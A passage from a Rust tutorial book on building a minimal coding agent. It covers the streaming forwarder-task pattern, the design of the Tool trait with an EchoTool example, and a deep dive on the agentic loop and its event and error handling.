StreamEvent— raw stream fragments includingTextDelta,ToolCallStart,ToolCallDelta, andDone. All the low-level grammar of a streaming LLM response. - Upstream (agent → UI): the UI wants
AgentEvent— agent-level notifications:TextDeltafor displayable text,ToolCallwhen a tool starts running,Donewhen the whole conversation finishes,Errorif something blows up.
StreamingAgent::chat is the translator. It has to:
- Hand the provider a
StreamEventchannel so the provider can send deltas into it. - Concurrently pull from that channel, filter
TextDeltas, and re-emit them asAgentEvent::TextDeltaon the UI channel — all while the provider is still generating. - Wait for the provider to return the assembled
AssistantTurn. - Decide: if the turn ended in
Stop, emitAgentEvent::Doneand return; if it ended inToolUse, emit aToolCallevent per call, run the tools, append results, and loop.
The critical word is concurrently in step 2. We cannot recv() events after stream_chat returns — by then the generation is over and the UI has been waiting on a frozen screen. We need a separate task pulling from the stream channel while the provider is still writing into it.
The forwarder-task pattern
Here is the full chat() implementation:
#![allow(unused)] fn main() { pub async fn chat( &self, messages: &mut Vec<Message>, events: mpsc::UnboundedSender<AgentEvent>, ) -> anyhow::Result<String> { let defs = self.tools.definitions(); loop { // 1. Fresh stream channel for this turn. let (stream_tx, mut stream_rx) = mpsc::unbounded_channel(); // 2. Spawn a forwarder task: drain stream_rx, relay TextDeltas to `events`. let events_clone = events.clone(); let forwarder = tokio::spawn(async move { while let Some(event) = stream_rx.recv().await { if let StreamEvent::TextDelta(text) = event { let _ = events_clone.send(AgentEvent::TextDelta(text)); } } }); // 3. Kick off generation. The provider writes StreamEvents into stream_tx. // Dropping stream_tx here would close the channel early — so we pass it by value. let turn = match self.provider.stream_chat(messages, &defs, stream_tx).await { Ok(t) => t, Err(e) => { let _ = events.send(AgentEvent::Error(e.to_string())); return Err(e); } }; // 4. stream_chat has returned → stream_tx was dropped → forwarder sees // stream_rx closed → forwarder exits. Await it to propagate any panic // and ensure all deltas are flushed before we emit downstream events. let _ = forwarder.await; // 5. Now handle the assembled turn: stop or another tool round. match turn.stop_reason { StopReason::Stop => { let text = turn.text.clone().unwrap_or_default(); let _ = events.send(AgentEvent::Done(text.clone())); messages.push(Message::Assistant(turn)); return Ok(text); } StopReason::ToolUse => { let mut results = Vec::with_capacity(turn.tool_calls.len()); for call in &turn.tool_calls { let _ = events.send(AgentEvent::ToolCall { name: call.name.clone(), summary: tool_summary(call), }); let content = match self.tools.get(&call.name) { Some(t) => t .call(call.arguments.clone()) .await .unwrap_or_else(|e| format!("error: {e}")), None => format!("error: unknown tool `{}`", call.name), }; results.push((call.id.clone(), content)); } messages.push(Message::Assistant(turn)); for (id, content) in results { messages.push(Message::ToolResult { id, content }); } // Loop: feed results back to the LLM. } } } } }
Step-by-step:
-
Fresh channel per loop iteration. A new
mpsc::unbounded_channel()every turn. We cannot reuse one across tool rounds — droppingstream_txis how the forwarder knows the turn is over (see step 4). If we kept the same channel, the forwarder would never exit. -
Spawn the forwarder.
tokio::spawnruns a task concurrently with the current one. The forwarder loops onstream_rx.recv().await, filteringStreamEvent::TextDeltaintoAgentEvent::TextDelta. Everything else is dropped —ToolCallStart/ToolCallDelta/Donedon't show up in the UI as text. We clone theeventssender before moving it into the task because we still need the original to sendToolCall/Done/Errorafter the forwarder exits. -
Call
stream_chatand wait. The provider is now writingStreamEvents intostream_tx. The forwarder pulls them off as they arrive and relays text to the UI. Meanwhile the current task is blocked on thestream_chatfuture. Three tasks are making progress at once: the HTTP response reader, the forwarder, and (via the channel) the UI renderer. -
Await the forwarder. When
stream_chatreturns, its local copy ofstream_txis dropped. That closes the channel, which makesstream_rx.recv()returnNone, which ends the forwarder'swhile letloop. Awaiting theJoinHandledoes two things: it guarantees the forwarder has flushed every last delta to the UI before we move on, and it surfaces any panic the forwarder might have hit. Forgetting thisawaitis the classic "last few tokens go missing" bug. -
Dispatch on
stop_reason. At this point we have a completeAssistantTurnand the UI has seen everyTextDelta. If the model is done (Stop), we emitAgentEvent::Doneand return. If it wants tools (ToolUse), we emit aToolCallevent per invocation (the UI uses these to show "[bash: ls]" spinners), run each tool with the same graceful-error pattern asSimpleAgent, append results tomessages, and let theloopspin — which will spawn a fresh forwarder andstream_chatfor the next turn.
Why not just rx.recv() in the main loop?
A single-task approach — "call stream_chat, then drain rx" — deadlocks. stream_chat does not return until the stream is fully consumed; with an unbounded channel full of events and nobody reading, the provider keeps writing forever (technically fine, but nothing gets rendered until the end). A bounded channel with that approach would block the provider on tx.send().await, which would block stream_chat, which would never return. Either way the UI sees no tokens until the turn is over — defeating the point of streaming.
The forwarder pattern decouples the two halves: the provider's writer side and the UI's reader side both make progress independently.
The working pattern, end to end
Here is the same flow drawn once, after the deadlock is fixed. Four Rust
tasks, three edges that matter: the provider writes tx, the forwarder
pulls rx and re-emits onto events, and the main loop awaits on
stream_chat's return value for control flow. Termination is purely
drop-based: when stream_chat returns, it drops tx; rx.recv() then
yields None; the forwarder loop exits; handle.await unblocks.
sequenceDiagram
participant M as Main loop
participant F as Forwarder task
participant P as stream_chat
participant U as UI (events rx)
M->>M: let (tx, rx) = mpsc::unbounded_channel::<StreamEvent>()
M->>F: tokio::spawn(forwarder(rx, events))
M->>P: provider.stream_chat(messages, tools, tx).await
Note over P: holds the tx sender;<br/>writes events as they arrive
P-->>F: tx.send(TextDelta) (many)
F-->>U: events.send(AgentEvent::TextDelta)
P-->>F: tx.send(ToolCallStart / Delta / Done)
F-->>U: events.send(...)
P-->>M: returns AssistantTurn (drops tx here)
Note over F: rx.recv() now returns None,<br/>forwarder loop exits naturally
F-->>M: JoinHandle resolves
M->>M: match turn.stop_reason { Stop => ..., ToolUse => ... }
Three invariants keep this alive:
- The provider owns the sender. Only
stream_chatholds atx— the main loop hands it over and does not keep a clone. Whenstream_chatreturns, the lasttxis dropped, which closes the channel. - The forwarder owns the receiver. It runs in its own spawned task so
the receiver can make progress while
stream_chatis still writing. No one else callsrx.recv(). - The main loop awaits both. First
stream_chat, then the forwarder'sJoinHandle. Awaiting the handle is what prevents the main loop from leaking a half-finished forwarder into the next iteration of the agent loop.
If any one of these three breaks — a stray tx clone held by the main
loop, the forwarder running inline on the main task, or the main loop
skipping the handle await — you get a subtle variant of the deadlock
above. This is why the pattern is worth learning once and reaching for
any time you need streaming I/O bridged into a step-wise decision loop.
Your task
Fill in the StreamingAgent::chat() stub in src/streaming.rs. Use the four-step recipe: channel, forwarder, await stream_chat, await forwarder. Then the match on stop_reason is the same shape as SimpleAgent::chat.
Run the tests
cargo test -p mini-claw-code-starter test_openrouter_
cargo test -p mini-claw-code-starter test_streaming_streaming_agent_
cargo test -p mini-claw-code-starter test_streaming_stream_chat_
What these tests verify
test_openrouter_ (OpenRouterProvider):
test_openrouter_convert_messages— internalMessagevariants are converted to the correct OpenAI API formattest_openrouter_convert_tools—ToolDefinitionvalues are wrapped in the OpenAI function-calling envelope
test_streaming_streaming_agent_ (StreamingAgent end-to-end against MockStreamProvider):
test_streaming_streaming_agent_text_response— single-turn text response; UI channel sees at least oneTextDeltaand aDonetest_streaming_streaming_agent_tool_loop— the agent runs a tool round and produces a final answer; UI channel sees aToolCallevent and aDonetest_streaming_streaming_agent_chat_history—chat()appends the final assistant turn to the caller-providedmessagesvec
test_streaming_stream_chat_ (OpenRouter streaming against a local TCP mock):
test_streaming_stream_chat_events_order— a scripted SSE body is parsed into events in the correct order and the assembledAssistantTurnmatches
Key takeaway
StreamingAgent is where everything from 5a pays off. The provider produces StreamEvents, the forwarder task translates them into UI-level AgentEvents as they arrive, and the main loop waits on the assembled AssistantTurn to decide what to do next. Tokens hit the terminal in real time; the agent loop still sees a clean, complete message — no special-casing for streaming vs non-streaming.
The pattern — "split a complex stream into two concurrent sides, bridged by a task" — is the same one Claude Code uses in its renderer. Once you've written it once, it shows up everywhere you need to mix streaming I/O with step-wise decision-making.
In Chapter 6 we turn from providers to tools — the other half of the agent's interface with the outside world.
Check yourself
← Chapter 5a: Provider & Streaming Foundations · Contents · Chapter 6: Tool Interface →
Chapter 6: Tool Interface
File(s) to edit: none — this chapter is a conceptual walkthrough of the
Tooltrait. The hands-onEchoToolbelow is meant to be built from scratch in a scratch file (or tried in the Rust playground); the starter does not ship anecho.rsstub and the existingtest_read_*tests from Chapter 2 are unaffected by anything you do here. Reading time: 25 min
Goal
- Understand why the
Tooltrait uses#[async_trait](object safety for heterogeneous storage) whileProvideruses RPITIT (zero-cost generics). - Implement a concrete
EchoToolthat demonstrates the full tool lifecycle: schema definition, trait implementation, registration, and execution. - Verify that
ToolSetcorrectly registers tools and returns their definitions for the LLM.
In the last chapter we gave our agent a voice by connecting it to an LLM provider. But a model that can only produce text is like a programmer who can only talk about code without ever touching a keyboard. In this chapter we give the agent hands.
You already defined the tool types in Chapter 4 -- ToolDefinition, Tool trait, and ToolSet. In this chapter we will understand why those types are designed the way they are, explore the critical distinction between #[async_trait] and RPITIT, and then wire everything together by implementing your first concrete tool: an EchoTool.
Tool lifecycle
flowchart LR
A[Tool::new] -->|stores| B[ToolDefinition]
B -->|registered in| C[ToolSet]
C -->|definitions sent to| D[LLM]
D -->|responds with| E[ToolCall]
E -->|dispatched via| C
C -->|lookup by name| F[Tool::call]
F -->|returns| G[String result]
G -->|wrapped as| H[Message::ToolResult]
Design context: how Claude Code models tools
Claude Code's TypeScript codebase defines tools with a generic Tool<Input, Output, Progress> type. Each tool carries a Zod schema for input validation, returns rich structured output (sometimes including React elements for terminal rendering), and can emit progress events during long-running operations. There are over 40 tools in production, each with permission metadata, cost hints, and UI integration.
We are going to keep the shape but cut the ceremony. In our Rust version:
| Claude Code (TypeScript) | mini-claw-code-starter (Rust) |
|---|---|
Tool<Input, Output, Progress> | trait Tool (no generics) |
| Zod schema for input | serde_json::Value + builder |
Rich ToolResult<T> | anyhow::Result<String> |
| React-rendered progress | (not implemented) |
| 40+ tools with Zod validation | 5 tools with JSON schema |
isReadOnly, isDestructive, etc. | (not implemented -- kept minimal) |
The key simplification: we drop the generic parameters and the safety/display methods. Claude Code needs <Input, Output, Progress> because each tool has a distinct strongly-typed input shape and renders different UI. We use serde_json::Value for input and String for output, which lets us store heterogeneous tools in a single collection without type erasure gymnastics.
Why two async trait styles? (#[async_trait] vs RPITIT)
This is the most important design decision in the type system, and it is worth understanding deeply. The same trade-off drives every async trait in this book -- Provider, Tool, StreamProvider, Hook, SafetyCheck. Read this section once; other chapters link back to it.
Look at the Provider trait from Chapter 4:
#![allow(unused)] fn main() { pub trait Provider: Send + Sync { fn chat<'a>( &'a self, messages: &'a [Message], tools: &'a [&'a ToolDefinition], ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a; } }
This uses RPITIT (return-position impl Trait in traits), a feature stabilized in Rust 1.75. The compiler generates a unique future type for each implementation. It is zero-cost and avoids boxing.
But RPITIT has a catch: it makes the trait non-object-safe. You cannot write Box<dyn Provider> because the compiler needs to know the concrete future type at compile time. That is fine for providers -- we use them as generic parameters (struct SimpleAgent<P: Provider>), so the concrete type is always known.
Tools are different. We need to store a heterogeneous collection of tools -- BashTool, ReadTool, WriteTool, all in one HashMap. That requires Box<dyn Tool>, which requires object safety. And object safety requires that async methods return a known type, not an opaque impl Future.
The #[async_trait] macro from the async-trait crate solves this by rewriting async fn call(...) into a method that returns Pin<Box<dyn Future<...> + Send + '_>>. The boxing has a small cost (one heap allocation per tool call), but tool calls involve I/O that dwarfs the allocation.
Provider: generic param P -> RPITIT (zero-cost, not object-safe)
Tool: stored in Box<dyn> -> #[async_trait] (boxed future, object-safe)
This split is a deliberate design choice. If Rust stabilizes dyn async fn in the future, we could drop async_trait entirely. Until then, the two-strategy approach gives us the best of both worlds.
Note that in the MockProvider impl from Chapter 5a, we wrote async fn chat(...) directly. That works because Rust 1.75+ allows async fn in trait impls even when the trait signature uses the RPITIT form. The compiler desugars it correctly. You can do the same for Tool impls -- write async fn call(...) and the #[async_trait] macro handles the rest.
Decision rule: which pattern for your next trait?
The question to ask about any new async trait is "do I need to store values of this trait with different concrete types in the same collection?" That single question decides it:
Do you need Box<dyn MyTrait> anywhere?
│
┌──────────────┴───────────────┐
▼ ▼
yes no
│ │
▼ ▼
#[async_trait::async_trait] trait MyTrait {
trait MyTrait: Send + Sync { fn do_it(&self)
async fn do_it(&self) -> impl Future<...> + Send;
-> Result<...>; }
} // callers use `impl MyTrait` or
// callers use Box<dyn MyTrait> // generic `<T: MyTrait>` params
Concrete cues that push you toward #[async_trait]:
- You want a
Vec<Box<dyn MyTrait>>,HashMap<K, Box<dyn MyTrait>>, or similar runtime-heterogeneous container. (This is whatToolSetdoes.) - You want to return
Box<dyn MyTrait>from a function because callers do not need to know the concrete type. - You want users to plug in new implementations at runtime (e.g. via a dynamic registry or plugin system).
Concrete cues that push you toward RPITIT:
- Every caller knows the concrete implementation at compile time. A struct
like
SimpleAgent<P: Provider>monomorphises once per provider. - Throughput matters enough that you care about avoiding one boxed-future allocation per call.
- The trait has lots of
asyncmethods and you do not wantasync_traitto insert aBoxaround each one.
For this book, every trait we define happens to fall cleanly on one side:
Provider / StreamProvider / SafetyCheck are monomorphised through
generic parameters (RPITIT); Tool / HookHandler / InputHandler get
stored as Box<dyn _> in a heterogeneous collection (#[async_trait]).
When you add a new trait in your own extensions, walk the question above
and you will not have to think about it again.
Why tool errors never terminate the agent
A tool failure is not an agent failure. If the LLM asks to read a file that does not exist, the right behaviour is to tell it "error: file not found" and let it recover -- try a different path, ask the user, or move on. A genuine Err(...) escaping to the top of the agent loop would instead terminate the conversation, which is almost never what we want.
We get that behaviour by agreement between the Tool impl and the agent loop:
- Tools return
anyhow::Result<String>. On failure they usebail!("reason")or?-propagation (context.read_to_string(...).with_context(|| ...)?). You will seebail!used heavily in the file tools in Chapter 9. - The agent loop catches tool errors with
.unwrap_or_else(|e| format!("error: {e}"))before packaging the result into aMessage::ToolResult. The LLM always receives a string -- either the tool's success output or the formatted error.
So from inside a tool you write idiomatic Rust (?, bail!, anyhow::Context); from the LLM's side every outcome looks like a string. The only failures that do escape the agent loop are genuinely unrecoverable ones -- network failure talking to the provider, a serialization bug, a panic -- none of which a tool implementation should produce on its own.
You will see one small variation in Chapter 14: SafeToolWrapper catches its safety-check errors and returns Ok("error: safety check failed: ...") directly, rather than letting them propagate. This is equivalent (the agent loop would have formatted the Err the same way), but keeps the wrapper's error-handling self-contained when it is acting as a pre-filter.
Hands-on: building an EchoTool
Time to implement your first concrete tool. We will build a minimal EchoTool that takes a text argument and returns it unchanged. This covers the full lifecycle: defining a schema, implementing the trait, and registering with a ToolSet.
Step 1: the struct and definition
#![allow(unused)] fn main() { struct EchoTool { def: ToolDefinition, } impl EchoTool { fn new() -> Self { Self { def: ToolDefinition::new("echo", "Echo the input") .param("text", "string", "Text to echo", true), } } } }
The ToolDefinition is built once in the constructor and stored as a field. The schema tells the LLM: "this tool is called echo, it takes a required string parameter called text."
Step 2: implement the Tool trait
#![allow(unused)] fn main() { #[async_trait::async_trait] impl Tool for EchoTool { fn definition(&self) -> &ToolDefinition { &self.def } async fn call(&self, args: Value) -> anyhow::Result<String> { let text = args["text"].as_str().unwrap_or("(no text)"); Ok(text.to_string()) } } }
A few things to note:
definition()returns a reference to the storedToolDefinition.call()indexes into the JSONargsto extracttext. If the key is missing or not a string, we fall back to"(no text)"rather than panicking. Always be defensive with LLM-provided arguments.call()returnsanyhow::Result<String>-- just a plain string, not aToolResultstruct. The starter keeps tool output simple.- There are only two required methods. No safety flags, no validation, no summary -- the starter's
Tooltrait is minimal.
Step 3: register and use
#![allow(unused)] fn main() { let tools = ToolSet::new().with(EchoTool::new()); // The agent loop would do this: let defs = tools.definitions(); // ... send defs to LLM, get back a ToolCall ... let tool = tools.get("echo").unwrap(); let result = tool.call(serde_json::json!({"text": "hello"})).await?; assert_eq!(result, "hello"); }
That is the full round-trip. Definition goes to the LLM, the LLM produces a ToolCall, we look up the tool by name, call it, and feed the result back.
The minimal trait
The starter's Tool trait has exactly two required methods:
| Method | Purpose |
|---|---|
definition() | Return the tool's JSON Schema description |
call() | Execute the tool and return a string result |
There are no default methods, no safety flags, no validation hooks. This is intentional -- the starter keeps things simple so you can focus on the agent loop mechanics. Claude Code's real tool system adds is_read_only(), is_destructive(), validate_input(), and more, but those are not needed to build a working agent.
How this compares to Claude Code
Claude Code's tool system is substantially larger:
- 40+ tools spanning file operations, git, search, browser, notebook, MCP, and more. We build 5.
- Zod schemas provide runtime validation with TypeScript type inference. We use
serde_json::Valuewith a builder. - React rendering -- tools can return React elements that render rich terminal UI (diffs, tables, progress bars). We return plain strings.
- Progress events -- tools emit typed progress events during execution. We have
activity_description()for a simple spinner. - Tool groups and permissions -- tools are organized into permission groups with allow/deny lists. We will build our permission system in Chapter 13, but it will be simpler.
- Cost hints -- tools can declare estimated token costs to help the context manager. Our
TokenUsagetype from Chapter 4 tracks tokens at the message level, but we do not carry cost hints on individual tools.
Despite these differences, the core protocol is identical. An LLM sees a list of tool schemas, decides to call one, the agent executes it, and the result goes back to the LLM. Everything else -- validation, permissions, progress, rendering -- is orchestration around that loop. Understanding the Tool trait gives you the foundation to understand Claude Code's full system.
Implementation note
There is no new source file to create in this chapter. The EchoTool exists
only in the test file (src/tests/ch3.rs). Your job is to verify that the types
you built in Chapter 4 -- Tool, ToolDefinition, ToolSet --
work correctly with a concrete tool implementation. If the test_read_ tests pass,
your type definitions are correct.
Run the tests
cargo test -p mini-claw-code-starter test_read_
What the tests verify
test_read_read_definition-- theReadToolproduces the correct name and a non-empty description from itsToolDefinition, and the"path"parameter is requiredtest_read_read_file-- calling with a valid path returns the file's content, verifying argument extraction and return valuetest_read_read_missing_file-- calling with a nonexistent path returns an errortest_read_read_missing_arg-- calling with no arguments returns an error
Key takeaway
The Tool trait is deliberately minimal -- just definition() and call(). This simplicity means every tool, from a trivial echo to a complex bash executor, implements the same two-method interface. The agent loop does not need to know what a tool does; it only needs to look it up by name and call it.
Summary
This chapter focused on the why behind the tool types you defined in Chapter 4:
#[async_trait]vs RPITIT -- the critical distinction. Tools need object safety for heterogeneous storage; providers need zero-cost generics. The two-strategy approach gives you both.- Errors are values -- tool failures return
Ok("error: ..."), notErr(...). The agent loop continues. The model adapts. - EchoTool -- your first concrete tool, demonstrating the full lifecycle: schema definition, trait implementation, registration, execution.
In the next chapter we build the SimpleAgent -- the loop that ties providers and tools together into a functioning agent.
Check yourself
← Chapter 5b: OpenRouter & StreamingAgent · Contents · Chapter 7: The Agentic Loop (Deep Dive) →
Chapter 7: The Agentic Loop (Deep Dive)
File(s) to edit:
src/agent.rs— only therun_with_historystub is new in this chapter.single_turn,execute_tools, andchatwere implemented back in Chapter 3; this chapter is a deep-dive walkthrough of the loop you already built, plus a thin new event-emitting variant. Tests to run: the same Chapter 3 tests still apply (cargo test -p mini-claw-code-starter test_single_turn_,cargo test -p mini-claw-code-starter test_simple_agent_); there is no dedicated test in the starter forrun_with_history— verify it manually by running the example in Chapter 5b and watching the event stream. Estimated time: 45 min
Goal
- Revisit
SimpleAgent::chatfrom Chapter 3 with a careful walk-through of the control flow, the message ordering, and the edge cases. You are not reimplementing it -- you are understanding what you already wrote. - Revisit
execute_toolsand make sure you know why tool errors become result strings rather than propagating -- the rationale links back to the agreement explained in Chapter 6. - Implement the one new piece:
run_with_history, an event-emitting variant of the main loop that sends anAgentEventafter every turn so a UI layer (built in later chapters) can observe progress. - Understand message ordering: why
Message::Assistantmust be pushed before the matchingMessage::ToolResultvalues.
This is the chapter where everything clicks.
In the previous chapters you built the vocabulary (messages), the mouth (provider), and the hands (tools). Now you build the brain -- the loop that ties them all together. The SimpleAgent is the heart of a coding agent. It is the thing that takes a user prompt, talks to an LLM, executes tools, feeds results back, and keeps going until the job is done.
Every coding agent -- Claude Code, Cursor, Aider, OpenCode -- has some version of this loop. The details vary (streaming, permissions, compaction), but the skeleton is identical. Get this right and you have a working agent. Everything else in this book is refinement.
What the SimpleAgent does
Here is the entire agent lifecycle in one sentence: prompt the LLM, check if it wants to use tools, execute those tools, send the results back, repeat until the LLM says it is done.
That is it. The SimpleAgent implements this loop. It owns three things:
- A provider -- the LLM backend (from Chapter 5a / 5b)
- A tool set -- the registered tools (from Chapter 6)
- A config -- safety limits and behavior knobs
flowchart TD
A[User prompt] --> B[SimpleAgent::chat]
B --> C[Provider.chat]
C --> D{StopReason?}
D -->|Stop| E[Return final text]
D -->|ToolUse| F[execute_tools]
F --> G[Push Message::Assistant]
G --> H[Push Message::ToolResult for each result]
H --> C
If you have read Claude Code's source, this maps to the query engine and the query function. Our version strips away streaming, permissions, hooks, and compaction -- those come in later chapters -- leaving the pure control flow.
The SimpleAgent struct
The starter's SimpleAgent is leaner than a production engine -- no config struct, no max turns, no truncation. Just a provider and tools:
#![allow(unused)] fn main() { pub struct SimpleAgent<P: Provider> { provider: P, tools: ToolSet, } }
Generic over P: Provider, so the same agent works with OpenRouterProvider in production and MockProvider in tests. The builder pattern lets you configure it fluently:
#![allow(unused)] fn main() { let agent = SimpleAgent::new(provider) .tool(BashTool::new()) .tool(ReadTool::new()) .tool(WriteTool::new()); }
No surprises. The interesting part is the methods that actually run.
execute_tools: the tool dispatch helper
Before tackling the main loop, we need a helper that takes a slice of ToolCalls from the LLM and produces results. This is execute_tools:
#![allow(unused)] fn main() { async fn execute_tools(&self, calls: &[ToolCall]) -> Vec<(String, String)> { let mut results = Vec::with_capacity(calls.len()); for call in calls { let result = match self.tools.get(&call.name) { Some(t) => { t.call(call.arguments.clone()) .await .unwrap_or_else(|e| format!("error: {e}")) } None => format!("error: unknown tool `{}`", call.name), }; results.push((call.id.clone(), result)); } results } }
Two stages:
-
Tool lookup -- If the LLM hallucinates a tool name that does not exist, we return an error string. The model sees
"error: unknown tool \foo`"` and can recover. This happens more than you might expect, especially with smaller models. -
Execute -- Run the tool. If it fails,
.unwrap_or_else(|e| format!("error: {e}"))converts the error to a string the model can read.
Note the return type: Vec<(String, String)> -- pairs of (call ID, result string). No ToolResult struct, no truncation, no validation. The starter keeps this simple.
This is a key design decision: tool errors become results, not panics. The agent loop never crashes because a tool failed. The model reads the error, adjusts its approach, and tries again.
The chat() method: the core loop
This is it. The agentic loop. Read it carefully -- it is shorter than you expect.
#![allow(unused)] fn main() { pub async fn chat(&self, messages: &mut Vec<Message>) -> anyhow::Result<String> { let defs = self.tools.definitions(); loop { let turn = self.provider.chat(messages, &defs).await?; match turn.stop_reason { StopReason::Stop => { let text = turn.text.clone().unwrap_or_default(); messages.push(Message::Assistant(turn)); return Ok(text); } StopReason::ToolUse => { let results = self.execute_tools(&turn.tool_calls).await; messages.push(Message::Assistant(turn)); for (id, content) in results { messages.push(Message::ToolResult { id, content }); } } } } } }
Let's break it down.
Tool definitions: collected once
#![allow(unused)] fn main() { let defs = self.tools.definitions(); }
We gather tool definitions outside the loop. They do not change between iterations -- the tool set is fixed for the lifetime of the agent. Every call to provider.chat() includes these definitions so the LLM knows which tools are available.
Call the provider
#![allow(unused)] fn main() { let turn = self.provider.chat(messages, &defs).await?; }
Send the full message history and tool definitions to the LLM. The ? propagates provider errors (network failure, auth error, rate limit) directly to the caller. Provider errors are not recoverable by the agent loop -- they need human intervention.
Match the stop reason
#![allow(unused)] fn main() { match turn.stop_reason { StopReason::Stop => { /* final answer */ } StopReason::ToolUse => { /* tool dispatch */ } } }
The LLM tells us why it stopped generating. Two possibilities:
Stop-- The model is done. It has a final text answer. Extract it, push the assistant message into history, return.ToolUse-- The model wants to use tools. It has populatedtool_callswith one or more calls. Execute them, push results, loop.
The two branches
StopReason::Stop -- Clone the text, push the assistant message into history, return. The conversation ends with an Assistant message, ready for the next user turn.
StopReason::ToolUse -- Execute the tools, then push messages in this exact order:
- First,
Message::Assistant(turn)-- the assistant's response including its tool calls - Then,
Message::ToolResult { id, content }for each tool result
This ordering matters. The LLM API expects tool results to follow the assistant message that requested them. Each ToolResult is linked to its ToolCall by the id field. If you push them in the wrong order, the provider will reject the request.
After pushing results, the loop continues. The next iteration sends the entire history -- including the tool calls and their results -- back to the LLM. The model sees what happened and decides what to do next.
Rust concept: ownership and &mut Vec<Message>
The caller owns the message history and passes it as &mut Vec<Message>. This is a deliberate Rust ownership decision -- the agent borrows the history mutably for the duration of the call, but ownership stays with the caller. The alternative would be for the agent to own the Vec, but then the caller could not inspect the history after the call, and multi-turn conversations would require moving the Vec in and out of the agent. &mut is the cleanest solution: the agent pushes messages into the caller's vec, and the caller retains full control afterward.
The caller owns the message history and passes it as &mut Vec<Message>. This is deliberate:
- Multi-turn conversations -- The caller can push a new
Message::User(...)and callchat()again. The agent picks up where it left off with the full context. - Inspection -- After
chat()returns, the caller can examine the full message history to see every tool call, every result, every intermediate step. - Persistence -- The caller can serialize the messages to disk for session save/resume.
run(): the convenience wrapper
Most of the time you just want to send a prompt and get a response. That is run():
#![allow(unused)] fn main() { pub async fn run(&self, prompt: &str) -> anyhow::Result<String> { let mut messages = vec![Message::User(prompt.to_string())]; self.chat(&mut messages).await } }
Two lines. Creates a fresh message history with the user prompt, delegates to chat(). The message history is discarded after the call -- use chat() directly if you need to preserve it.
AgentEvent: making it observable
The chat() method returns when the agent is done. That is fine for tests, but a real UI needs to show progress while the loop is running. What tool is being called? How long has it been running? Is it done?
The AgentEvent enum models these updates:
#![allow(unused)] fn main() { #[derive(Debug)] pub enum AgentEvent { /// A chunk of text streamed from the LLM (streaming mode only). TextDelta(String), /// A tool is being called. ToolCall { name: String, summary: String }, /// The agent finished with a final response. Done(String), /// The agent encountered an error. Error(String), } }
Four variants covering the lifecycle:
| Event | When | UI use |
|---|---|---|
TextDelta | LLM streams a text chunk | Append to terminal output |
ToolCall | A tool is being called | Show: " [bash: ls -la]" |
Done | Agent loop finished | Display final answer |
Error | Unrecoverable error | Show error message |
Note: the starter combines ToolStart/ToolEnd into a single ToolCall event. The summary field is generated by the tool_summary() helper in src/agent.rs, which looks for common argument keys (command, path, question) and formats them like [bash: ls -la].
run_with_events / run_with_history
These methods duplicate the core loop logic but emit events through a tokio::sync::mpsc::UnboundedSender<AgentEvent> channel. The caller creates the channel, passes the sender, and consumes events from the receiver -- typically in a separate task that drives the UI.
#![allow(unused)] fn main() { pub async fn run_with_events( &self, prompt: &str, events: mpsc::UnboundedSender<AgentEvent>, ) { let messages = vec![Message::User(prompt.to_string())]; self.run_with_history(messages, events).await; } }
run_with_history has the same structure as chat() but with events woven in. It takes ownership of the messages vec and returns the full history. Errors are sent as AgentEvent::Error rather than propagated.
The key differences from chat():
- Provider errors are caught with
matchinstead of?, and sent asAgentEvent::Error. - ToolCall events fire for each tool call, using the
tool_summary()helper to produce a one-line description. - Done event fires before pushing the final assistant message, so the UI gets the text immediately.
Note the let _ = events.send(...) pattern. The send can fail if the receiver has been dropped (the UI task crashed or exited early). We ignore the error because the agent should finish its work regardless of whether anyone is watching.
Using events in practice
The caller creates an unbounded channel, passes the sender to the agent, and reads events from the receiver -- typically in a separate task:
#![allow(unused)] fn main() { let (tx, mut rx) = tokio::sync::mpsc::unbounded_channel(); let agent_handle = tokio::spawn(async move { agent.run_with_events("Fix the bug in main.rs", tx).await }); while let Some(event) = rx.recv().await { match event { AgentEvent::ToolCall { summary, .. } => println!("{summary}"), AgentEvent::Done(text) => { println!("{text}"); break; } AgentEvent::Error(e) => { eprintln!("Error: {e}"); break; } _ => {} } } }
This two-task pattern is what a TUI builds on. The UI task renders events; the agent task runs the loop. They communicate through the channel.
Error handling philosophy
The agent has two distinct error strategies, and the boundary between them is intentional.
Tool errors become results
When a tool fails -- execution error, unknown tool -- the error becomes a string result that the model sees as a normal tool result. The loop continues. The model reads the error and adapts.
Tool error flow:
LLM requests bash("some_command")
-> Tool returns Err(e)
-> unwrap_or_else converts to "error: {e}"
-> Pushed as Message::ToolResult { id, content: "error: ..." }
-> LLM sees error, tries different approach
This is essential for robust agents. Models make mistakes. Tools fail for legitimate reasons. The agent should recover, not crash.
Provider errors propagate
When the provider fails -- network timeout, authentication error, rate limit, malformed response -- the error propagates up via ? (in chat()) or via AgentEvent::Error (in chat_with_events()). The loop stops.
Provider error flow:
Agent calls provider.chat()
-> Provider returns Err(network timeout)
-> chat() returns Err(network timeout)
-> Caller handles it (retry, show error, etc.)
Provider errors are not the agent's problem. They need human or system-level intervention (check your API key, wait for rate limits, fix your network). The agent does not try to recover.
Message history management
The order in which messages are pushed into the history is load-bearing. After a tool-use turn:
#![allow(unused)] fn main() { StopReason::ToolUse => { let results = self.execute_tools(&turn.tool_calls).await; messages.push(Message::Assistant(turn)); // 1. Assistant message (with tool_calls) for (id, content) in results { messages.push(Message::ToolResult { id, content }); // 2. Tool results } } }
The resulting message sequence looks like:
[User] "What files are in src/?"
[Assistant] tool_calls: [bash("ls src/")] <- includes the tool call
[ToolResult] "main.rs\nlib.rs\n" <- linked by call ID
[Assistant] "There are two files: ..." <- next LLM response
Why this order?
-
API requirement: The Claude API (and OpenAI-compatible APIs) require that
tool_resultmessages immediately follow theassistantmessage that generated the correspondingtool_use. Violating this causes a 400 error. -
ID linking: Each
Message::ToolResulthas anidthat matches aToolCall.idin the preceding assistant message. The LLM uses this to associate results with requests when there are multiple parallel tool calls. -
Context for the next turn: The LLM needs to see its own tool calls to understand what it asked for, and the results to know what happened. Both must be present in the history for the next
provider.chat()call.
Putting it all together: a complete trace
Let's trace through a realistic scenario. The user asks: "What is 2 + 3?"
The agent has an AddTool registered. The mock provider is configured to return a tool call first, then a final answer.
Turn 0:
messages: [User("What is 2 + 3?")]
-> provider.chat() returns: ToolUse, tool_calls: [add(a=2, b=3)]
-> execute_tools: AddTool.call({a:2, b:3}) -> Ok("5")
-> push: Assistant(tool_calls: [add(a=2, b=3)])
-> push: ToolResult { id: "call_1", content: "5" }
Turn 1:
messages: [User, Assistant, ToolResult]
-> provider.chat() returns: Stop, text: "The sum is 5"
